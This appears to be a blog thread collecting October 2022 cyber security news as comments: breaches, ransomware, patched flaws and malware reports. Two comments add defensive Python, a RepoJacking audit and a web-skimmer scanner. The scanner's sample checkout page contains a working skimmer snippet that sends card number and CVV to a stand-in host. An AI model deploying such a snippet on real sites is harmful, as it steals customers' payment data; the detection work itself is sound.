Cyber security news October 2022

This posting is here to collect cyber security news in October 2022.

I post links to security vulnerability news in the comments of this article.

You are also free to post related links to comments.


  1. Tomi Engdahl says:

    Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company
    The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The Mumbai-based firm, which is India’s largest integrated power company, is part of the Tata Group conglomerate.

  2. Tomi Engdahl says:

    Google Chrome to drop support for Windows 7 / 8.1 in Feb 2023
    Google announced today that the Google Chrome web browser will likely drop support for Windows 7 and 8.1 starting February 2023.

  3. Tomi Engdahl says:

    Internet is shut down in Sudan on anniversary of military coup
    Online access in Sudan was disrupted Tuesday as tens of thousands protested on the anniversary of a military coup that derailed a transition towards democratic governance.

  4. Tomi Engdahl says:

    FTC Targets Drizly and Its CEO Over Cybersecurity Failures That Led to Data Breach

    The Federal Trade Commission (FTC) this week announced an administrative complaint against online alcohol marketplace Drizly and its CEO, James Cory Rellas, over the company’s poor data security practices.

    The FTC acted on the company’s security failures that led to a data breach impacting the personal information of over 2.5 million individuals, and which occurred even though Drizly and Rellas were informed of existing security issues two years prior.

    Because the company failed to implement strong protections for customer data, the FTC is now requiring Drizly to destroy unnecessary data and to collect less information from its customers, and binds Rellas to specific data security requirements.

    “Our proposed order against Drizly not only restricts what the company can retain and collect going forward but also ensures the CEO faces consequences for the company’s carelessness. CEOs who take shortcuts on security should take note,” FTC director Samuel Levine said.

  5. Tomi Engdahl says:

    US Charges Ukrainian ‘Raccoon Infostealer’ With Cybercrimes

    By AFP on October 25, 2022

    A Ukrainian man has been charged with computer fraud for allegedly infecting millions of computers with malware in a cybercrime operation known as “Raccoon Infostealer,” the US Justice Department said Tuesday.

  6. Tomi Engdahl says:

    Arnica Raises $7 Million to Protect Software Developers, Code

    Behavior-based threat detection startup Arnica has raised $7 million in a seed funding round led by Joule Ventures and First Rays Venture Partners, with participation from several angel investors.

    Founded in August 2021, the Atlanta-based startup aims to secure the software supply chain by monitoring developers’ behavior to validate the authenticity of changes made to the code and identify attackers impersonating developers.

    Arnica relies on machine learning and graph-based behavioral analysis to help organizations tackle anomalies and risks in their development ecosystem, to keep both code and developers protected.

  7. Tomi Engdahl says:

    Apple Fixes Exploited Zero-Day With iOS 16.1 Patch

    Apple on Monday shipped a major iOS update with fixes for at least 20 documented security defects, including a kernel flaw that’s already being actively exploited in the wild.

    The Cupertino device maker confirmed the active exploitation of CVE-2022-42827, warning in a barebones advisory that the flaw exposes iPhones and iPads to arbitrary code execution attacks.

    “An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited,” Apple said in a note documenting the security vulnerabilities.

    About the security content of iOS 16.1 and iPadOS 16
    This document describes the security content of iOS 16.1 and iPadOS 16.

  8. Tomi Engdahl says:

    Perygee Scores Seed Funding to Tackle IoT Security

    Perygee, an early-stage startup with ambitious plans in the enterprise IoT security space, has banked $4.75 million in new seed financing as investors continue to make bets on technology to secure devices outside the traditional corporate network.

    The company, which maintains corporate headquarters in Boston, said the latest funding was led by Ballistic Ventures and included investments from a roster of prominent cybersecurity executives.

    To date, Perygee has raised $6.35 million in funding.

  9. Tomi Engdahl says:

    Medibank Confirms Broader Cyberattack Impact After Hackers Threaten to Target Celebs

    Australian private insurer Medibank on Tuesday confirmed that a recently disclosed cyberattack impacts the data of more customers than initially thought. The announcement came days after hackers threatened to target celebrities.

    Identified on October 12, the cyberattack was deemed the precursor of a ransomware event, but was contained before ransomware could be deployed, Medibank has announced.

    Roughly one week later, the company announced that it had been contacted by a threat actor claiming to have stolen roughly 200 gigabytes of data during the cyberattack.

  10. Tomi Engdahl says:

    Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans
    The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That’s according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy.

  11. Tomi Engdahl says:

    Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities
    Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows.

  12. Tomi Engdahl says:

    GitHub resolves flaw allowing attacker to take over repository, infect all applications
    GitHub has addressed a vulnerability allowing attackers to take control of one of its repositories and potentially infect all applications and other code relying on it.

  13. Tomi Engdahl says:

    Medibank says hackers had access to ‘all personal data’ belonging to all customers
    Medibank, the Australian health insurance company which initially claimed to have foiled a ransomware attack saying that it had found “no evidence customer data has been removed from our network” has now confirmed that criminals had access to all of the personal data of all of its customers.

  14. Tomi Engdahl says:

    Finnair customers’ data has leaked to outsiders as part of a data breach
    TAP Air Portugal was hit by a ransomware attack in August. Finnair customer data was involved because of the airlines’ route cooperation. (possible paywall)

  15. Tomi Engdahl says:

    A Pro-China Disinfo Campaign Is Targeting US Elections, Badly
    The suspected Chinese influence operation had limited success. But it signals a growing threat from a new disinformation adversary.

  16. Tomi Engdahl says:

    Online ticketing company “See” pwned for 2.5 years by attackers
    See Tickets is a major global player in the online event ticketing business: they’ll sell you tickets to festivals, theatre shows, concerts, clubs, gigs and much more. The company has just admitted to a major data breach that shares at least one characteristic with the amplifiers favoured by notorious rock performers Spinal Tap: “the numbers all go to 11, right across the board.”

  17. Tomi Engdahl says:

    Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
    Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs: landing URLs and host URLs. We define a malicious landing URL as one that allows a user to click a malicious link. A malicious host URL is a page containing a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

  18. Tomi Engdahl says:

    Microsoft fixes Windows vulnerable driver blocklist sync issue
    Microsoft says it addressed an issue preventing the Windows kernel vulnerable driver blocklist from being synced to systems running older Windows versions.

  19. Tomi Engdahl says:

    Jira Align flaws enabled malicious users to gain super admin privileges and potentially worse
    A pair of vulnerabilities patched in Jira Align could in the “worst-case scenario” be combined by low-privileged malicious users to target Atlassian’s cloud infrastructure, a security researcher warns.

  20. Tomi Engdahl says:

    VMware Patches Critical Vulnerability in End-of-Life Product
    VMware this week announced patches for a critical remote code execution vulnerability in VMware Cloud Foundation and NSX Data Center for vSphere (NSX-V).
    Tracked as CVE-2021-39144 (CVSS score of 9.8), the security defect exists in XStream, an open source library to serialize objects to XML and back.
    The bug impacts all XStream iterations up to and including version 1.4.17. Only out-of-the-box versions are affected, but not those where XStream’s security framework was set up with a whitelist limited to the minimal required types.
    “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of ‘root’ on the appliance,” VMware notes in its advisory.
    NSX-V 6.4.x reached end of general support in January 2022. VMware says that it typically does not mention end-of-life (EOL) products in its advisories, but in this case it has decided to release the patch due to the vulnerability’s critical severity.
    VMware says that all NSX-V versions prior to 6.4.14 and VMware Cloud Foundation (VCF) 3.x releases are impacted. The vulnerability has been addressed with the release of NSX-v 6.4.14 and VCF
    VMware’s advisory also describes a medium-severity XML External Entity (XXE) vulnerability in VCF (CVE-2022-31678) that could be exploited by unauthenticated attackers to cause a denial-of-service (DoS) condition or to leak information.

  21. Tomi Engdahl says:

    Data Breach at Australian Health Insurer Impacts 4 Million Customers; Could Cost $35M

    Australian health insurer Medibank on Wednesday confirmed that the personal and health information of all customers has been compromised in a recent data breach.

    Identified on October 12 and consistent with the precursor of a ransomware attack – albeit no ransomware has been deployed on Medibank’s systems – the incident has resulted in a threat actor exfiltrating roughly 200 gigabytes of data.

    Last week, the hackers contacted Medibank to boast about the data theft, threatening to target the company’s 1,000 most famous customers unless a ransom was paid.

    Medibank launched an investigation into the incident immediately after identifying it, but has not provided specific details on the number of impacted customers until now.

    Today, however, the health insurer confirmed that all its 3.9 million customers have been impacted by the data breach.

  22. Tomi Engdahl says:

    Data Breach Victims Sue Rhode Island Transit Agency, Insurer

    Two people whose personal information was compromised in a data breach at Rhode Island’s public bus service that affected about 22,000 people sued the agency and a health insurer on Tuesday seeking monetary damages and answers.

    The class-action suit filed in Providence Superior Court by cooperating attorneys for the American Civil Liberties Union of Rhode Island names the Rhode Island Public Transit Authority and United Healthcare as defendants.

    The personal information of roughly 5,000 RIPTA employees and retirees and thousands of other current, former and retired state workers, including Social Security numbers and Medicare identification numbers, was hacked in August 2021 through unauthorized access to RIPTA’s computer system.

    “When an individual’s confidential personal and health care information is compromised, that individual will have to worry about the potential for identity theft which could lead to financial ruin by impacting their savings, livelihood, credit score, and access to health care,” ACLU attorney Peter Wasylyk said. “It can cause significant stress for the rest of that individual’s lifetime.”

  23. Tomi Engdahl says:

    The NATO application is now visible in cyber attacks aimed at Finland

    The war between Russia and Ukraine is now also having a major impact in the cyber world. According to Check Point Software, global attacks increased by 28 percent in the third quarter of this year. Finland is now receiving a growing share of the attacks, which is probably explained by our NATO application.

    In Finland, companies were targeted by an average of 1,324 cyber attacks per week in July-September. The figure is 93 percent higher than a year earlier, meaning the number of cyber attacks has nearly doubled. It should be stressed that Check Point does not offer any assessment of the reasons for the growth in attacks on Finland, but figuring out the source is hardly rocket science at the moment.

    According to Check Point, Russia’s war of aggression does not explain all of the growth in the number of cyber attacks. According to the company, it appears that hackers and attack groups have gained momentum and confidence to attack a seemingly endless number of targets around the world.

  24. Tomi Engdahl says:

    HyperSQL DataBase flaw leaves library vulnerable to RCE

    Mishandling of untrusted input issue resolved by developers

    Security researchers have discovered a serious vulnerability in HyperSQL DataBase (HSQLDB) that poses a remote code execution (RCE) risk.

    HSQLDB offers a Java-based SQL relational database system. The technology – which is the second most popular embedded SQL database with 100 million downloads to date – is used for development, testing, and deployment of database applications.

    HSQLDB is used by more than 3,120 Maven packages including LibreOffice, JBoss, Log4j, Hibernate, and Spring-Boot as well as various enterprise software packages.

  25. Tomi Engdahl says:

    Windows Event Log Vulnerabilities Could Be Exploited to Blind Security Products

    Remote attackers could exploit two Event Log vulnerabilities in Windows to crash the Event Log application and cause a denial-of-service (DoS) condition, Varonis warns.

    Event Log is an Internet Explorer-specific application that exists in all Windows iterations, due to the deep integration of the browser with the operating system.

    Due to the specific set of permissions that Event Log has, two security defects haunt all Windows iterations up to Windows 10, even with Microsoft ending support for Internet Explorer in June 2022.

    Called LogCrusher, the first of the exploits could allow a domain user to crash the Event Log on any Windows machine on the domain, remotely.

    The second exploit, called OverLog and tracked as CVE-2022-37981, allows a remote attacker to fill the hard drive of a Windows machine with log data, causing a denial-of-service (DoS) condition.

    The two exploits abuse the Microsoft Event Log Remoting Protocol (MS-EVEN), which exposes remote procedure call (RPC) methods to remote access. Specifically, they abuse OpenEventLog, a function that allows privileged users to read, write, and clear event logs on remote machines.

  26. Tomi Engdahl says:

    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    You don’t have to use Internet Explorer for its legacy to have left you vulnerable to LogCrusher and OverLog, a pair of Windows vulnerabilities discovered by the Varonis Threat Labs team.
    Microsoft ended support for Internet Explorer on June 15, 2022. However, IE’s deep integration into the Windows ecosystem impacts the security and stability of current Windows operating systems.
    One feature of the IE and Windows integration is an Internet Explorer-specific Event Log that is present on all current Windows operating systems. This IE-specific Event Log has a distinct set of permissions that enable two exploits against Windows systems:
    LogCrusher, which allowed any domain user to remotely crash the Event Log application of any Windows machine on the domain.
    OverLog, which causes a remote denial-of-service (DoS) attack by filling the hard drive space of any Windows machine on the domain. (CVE-2022-37981)
    Microsoft released a partial patch on October 11, 2022. We urge everyone to patch their systems.

    Windows Event Logging Service Denial of Service Vulnerability
    According to the CVSS metric, availability is low (A:L). How could an attacker impact the availability?
    The performance can be interrupted and/or reduced, but the attacker cannot fully deny service.

  27. Tomi Engdahl says:

    See Tickets Customer Payment Card Data Stolen by Web Skimmer

    Ticketing services agency See Tickets is informing users that their payment card data was likely exposed after hackers injected skimmer code on its website.

    Owned by Vivendi SA, See Tickets provides ticketing services for comedy, festival, lifestyle, music, sport, and other types of events and operates several websites targeting both international and regional audiences in North America and Europe.

    The skimmer attack was initially identified in April 2021 and was fully shut down in January 2022, the company notes in a data breach notification letter sent to potentially impacted users, a copy of which was submitted to the Montana Attorney General’s office.

    Skimmer attacks rely on the injection of malicious JavaScript code into ecommerce websites, typically on checkout pages, to steal the information that the website’s users provide.
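A static, heuristic check for the kind of injection described above, as an added example that is not part of the original post or of any See Tickets tooling: it parses a checkout page with Python’s standard library, flags external scripts loaded from hosts outside a first-party allowlist without an integrity attribute, and flags inline scripts that both touch payment fields and hook the form or call an exfiltration primitive while naming an off-site URL. The page markup, host names and URLs are constructed for the demo; the regular expressions are rough indicators, not a signature of any real campaign.

```python
"""Heuristic static scan of a checkout page for web-skimmer indicators.

Added example for this thread, not See Tickets or vendor code. The page
markup, host names and URLs below are constructed; the regular expressions are
coarse indicators of skimmer behaviour, not a signature of any real campaign.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Names a skimmer typically reads from the checkout form
PAYMENT_FIELDS = re.compile(r"card[-_ ]?(number|num|no)|cvv|cvc|expir", re.I)
# Hooks used to capture the form as the customer submits or types
FORM_HOOKS = re.compile(r"addEventListener\(\s*['\"](submit|input|change|keyup)|onsubmit|\.submit\(", re.I)
# Primitives used to send captured data off-site
EXFIL_CALLS = re.compile(r"\bfetch\s*\(|\bXMLHttpRequest\b|\bsendBeacon\s*\(|new\s+Image\s*\(|\.src\s*=", re.I)
URL_LITERAL = re.compile(r"https?://[^\s'\"`<>]+", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, has_integrity)
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _foreign_urls(code, first_party_hosts):
    return [u for u in URL_LITERAL.findall(code) if urlparse(u).hostname not in first_party_hosts]


def scan_checkout_page(html, first_party_hosts):
    """Return (indicator, evidence) pairs for scripts that look like skimmer activity."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, has_integrity in parser.external:
        host = urlparse(src).hostname
        # A third-party script without Subresource Integrity can be swapped out at will
        if host and host not in first_party_hosts and not has_integrity:
            findings.append(("external-script-unknown-host", src))
    for code in parser.inline:
        touches_fields = PAYMENT_FIELDS.search(code)
        captures = FORM_HOOKS.search(code) or EXFIL_CALLS.search(code)
        foreign = _foreign_urls(code, first_party_hosts)
        # Reads card fields, has capture/exfil logic, and names an off-site URL
        if touches_fields and captures and foreign:
            findings.append(("inline-skimmer-pattern", foreign[0]))
    return findings


FIRST_PARTY_HOSTS = {"shop.example.com", "cdn.example.com"}

# Constructed checkout page: one SRI-pinned first-party script, one unpinned
# third-party widget, a benign field formatter, and an injected skimmer.
SAMPLE_PAGE = """
<html><body>
<script src="https://cdn.example.com/checkout.js" integrity="sha384-abc"></script>
<script src="https://widgets.third-party.example.org/chat.js"></script>
<form id="checkout"><input id="cardNumber"><input id="cvv"></form>
<script>
document.getElementById('cardNumber').addEventListener('input', function (e) {
  e.target.value = e.target.value.replace(/\\D/g, '');
});
</script>
<script>
window.addEventListener('load', function () { console.log('ready'); });
</script>
<script>
document.querySelector('#checkout').addEventListener('submit', function () {
  var d = {n: document.getElementById('cardNumber').value,
           c: document.getElementById('cvv').value};
  fetch('https://stats-collect.example.net/p', {method: 'POST', body: JSON.stringify(d)});
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for indicator, evidence in scan_checkout_page(SAMPLE_PAGE, FIRST_PARTY_HOSTS):
        print(f"{indicator:28} {evidence}")
```

The benign formatter reads the card field and hooks `input` but names no off-site URL, so it is not flagged; the injected script is flagged only because all three indicators coincide. A check like this belongs in a periodic crawl of the rendered checkout page, alongside a Content-Security-Policy that restricts `script-src` and `connect-src` to first-party hosts.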

  28. Tomi Engdahl says:

    GitHub Account Renaming Could Have Led to Supply Chain Attacks

    Checkmarx warns that attackers could have exploited the renaming of popular GitHub accounts to create malicious repositories using the vacated name and launch software supply chain attacks.

    The technique, dubbed RepoJacking, involves the hijacking of a renamed repository’s traffic by breaking GitHub’s redirection mechanism, and routing the traffic to a malicious repository controlled by the attacker.

    Each GitHub repository has a unique URL under the user account that created it and, whenever the repository is cloned, the full repository URL is used.

    When a user changes their GitHub account username, the URL is changed by replacing the old username with the new one, and the code-hosting platform automatically redirects users to the new URL (for example, becomes

    An attacker aware of the change could have hijacked the old URL traffic by creating a GitHub account using the old username, and then creating a repository matching the old repository’s name, thus gaining control over the URL and breaking the default redirect.

    Attacking the Software Supply Chain with a Simple Rename

    Checkmarx SCS (Supply Chain Security) team found a vulnerability in GitHub that can allow an attacker to take control over a GitHub repository, and potentially infect all applications and other code relying on it with malicious code.

    If not explicitly tended, all renamed usernames on GitHub were vulnerable to this flaw, including over 10,000 packages on the Go, Swift, and Packagist package managers. This means that thousands of packages could have been hijacked immediately and start serving malicious code to millions of users.

    The vulnerability was fixed by GitHub following our report and is no longer exploitable.
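To see how the redirect described above turns into a supply-chain exposure from the consumer side, here is an added example (not Checkmarx’s or GitHub’s code) that audits a go.mod for github.com dependencies still referencing a renamed owner. The rename map, the set of registered usernames and the repositories under re-registered names are constructed inputs; in practice they would come from your dependency inventory and the GitHub API. The classification follows the mechanics in the text: while the old name is unregistered the redirect works but anyone may claim the name; once the old name is re-registered and a same-named repository exists under it, the redirect is broken and that repository is served instead.

```python
"""RepoJacking exposure audit for GitHub-hosted Go dependencies.

Added example for this thread, not code from Checkmarx or GitHub.
Assumptions (constructed for the demo): the rename map, the registered-user
set and the repositories under re-registered names would normally come from
your own inventory and the GitHub API; here they are literals.
"""
import re
from dataclasses import dataclass

# owner/repo part of a GitHub module path, e.g. github.com/alice/lib/v2
GITHUB_PATH = re.compile(
    r"^github\.com/(?P<owner>[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)/(?P<repo>[A-Za-z0-9_.-]+)"
)


@dataclass(frozen=True)
class Finding:
    module: str
    old_owner: str
    new_owner: str
    status: str  # "at-risk" | "owner-taken" | "hijacked"


def parse_go_mod(text):
    """Return module paths from single-line and block `require` directives."""
    modules, in_block = [], False
    for raw in text.splitlines():
        line = raw.split("//", 1)[0].strip()  # drop comments such as `// indirect`
        if not line:
            continue
        if line == "require (":
            in_block = True
        elif in_block and line == ")":
            in_block = False
        elif in_block:
            modules.append(line.split()[0])
        elif line.startswith("require "):
            modules.append(line.split()[1])
    return modules


def classify(module, renames, registered_users, repos_by_owner):
    """Classify one module path; the lookup inputs must already be lower-cased."""
    m = GITHUB_PATH.match(module)
    if not m:
        return None  # not hosted on GitHub
    owner, repo = m["owner"], m["repo"]
    key = owner.lower()  # GitHub usernames are case-insensitive
    if key not in renames:
        return None  # owner never renamed: no redirect to break
    if key not in registered_users:
        status = "at-risk"      # redirect still works, but the old name is free to claim
    elif repo.lower() in repos_by_owner.get(key, set()):
        status = "hijacked"     # same-named repo under the re-registered name breaks the redirect
    else:
        status = "owner-taken"  # old name re-registered; one repo creation away from hijack
    return Finding(module, owner, renames[key], status)


def audit(go_mod_text, renames, registered_users, repos_by_owner):
    """Return findings for every github.com dependency whose owner was renamed."""
    renames = {k.lower(): v for k, v in renames.items()}
    registered = {u.lower() for u in registered_users}
    repos = {o.lower(): {r.lower() for r in rs} for o, rs in repos_by_owner.items()}
    findings = []
    for module in parse_go_mod(go_mod_text):
        finding = classify(module, renames, registered, repos)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample input: none of these accounts or packages are real.
SAMPLE_GO_MOD = """\
module example.com/app

go 1.19

require (
    github.com/old-alice/netutil v1.4.0
    github.com/old-bob/parser v0.9.2 // indirect
    github.com/carol/tools v2.1.0
    github.com/old-dave/cache v1.0.0
    golang.org/x/text v0.3.7
)
require github.com/carol/extra v0.1.0
"""
SAMPLE_RENAMES = {"old-alice": "alice", "old-bob": "bob", "old-dave": "dave"}
SAMPLE_REGISTERED = {"alice", "bob", "carol", "dave", "old-bob", "old-dave"}  # old-alice is free
SAMPLE_REPOS = {"old-bob": {"parser"}, "old-dave": {"unrelated"}}

if __name__ == "__main__":
    for f in audit(SAMPLE_GO_MOD, SAMPLE_RENAMES, SAMPLE_REGISTERED, SAMPLE_REPOS):
        print(f"{f.status:12} {f.module}  (rewrite to github.com/{f.new_owner}/...)")
```

Whatever the status, the remediation on the consumer side is the same: rewrite the module path to the new owner so that nothing depends on the redirect.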

  29. Tomi Engdahl says:

    New York Post ‘Hacked’ in Tweets Calling for Assassination of Biden, Lawmakers

    The New York Post said Thursday it had been “hacked” by an employee after the tabloid newspaper’s Twitter account posted a series of antagonistic messages, including a call for the assassination of US President Joe Biden.

    The rogue tweets were removed late Thursday morning.

    “The New York Post has been hacked. We are currently investigating the cause,” a message on the tabloid’s account said.

    “The New York Post’s investigation indicates that the unauthorized conduct was committed by an employee,” the Post said in a statement to AFP, adding that the worker in question had been fired.

    The tweets, published Thursday morning, included a call for the assassination of Biden, along with a demand to kill New York lawmaker Alexandria Ocasio-Cortez.

    The messages were formatted to look like normal tweets usually posted by the newspaper, which is owned by NewsCorp, the media empire owned by Australian billionaire Rupert Murdoch.

  30. Tomi Engdahl says:

    The football World Cup is starting: if you go there in person, you are ordering yourself a pile of trouble
    The State of Qatar forces everyone, including visitors, to install on their smartphones the Qatar-developed Ehteraz COVID tracking app.
    According to Norway’s NRK, Ehteraz is in practice state-funded spyware.

  31. Tomi Engdahl says:

    Point-of-sale malware used to steal 167,000 credit cards
    In the 19 months between February 2021 and September 2022, two point-of-sale (POS) malware operators have stolen more than 167,000 payment records, mainly from the US, according to researchers at Group-IB. The researchers were able to retrieve information about infected machines and compromised credit cards by analyzing a command and control (C2) server used by the malware.

  32. Tomi Engdahl says:

    Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
    Microsoft has discovered recent activity indicating that the Raspberry Robin worm is part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread. These infections lead to follow-on hands-on-keyboard attacks and human-operated ransomware activity. Our continuous tracking of Raspberry Robin-related activity also shows a very active operation: Microsoft Defender for Endpoint data indicates that nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.

  33. Tomi Engdahl says:

    Drinik Android malware now targets users of 18 Indian banks
    A new version of the Drinik Android trojan targets 18 Indian banks, masquerading as the country’s official tax management app to steal victims’ personal information and banking credentials. Drinik has been circulating in India since 2016, operating as an SMS stealer, but in September 2021, it added banking trojan features that target 27 financial institutes by directing victims to phishing pages.

  34. Tomi Engdahl says:

    New York Post hacked with offensive headlines targeting politicians
    New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians.

  35. Tomi Engdahl says:

    New York Post was hacked from the inside, employee fired after offensive articles posted online
    It transpires that the newspaper had not fallen victim to external hackers as had first been suspected, but instead a rogue employee who had access to the website’s content management system (CMS) was responsible.

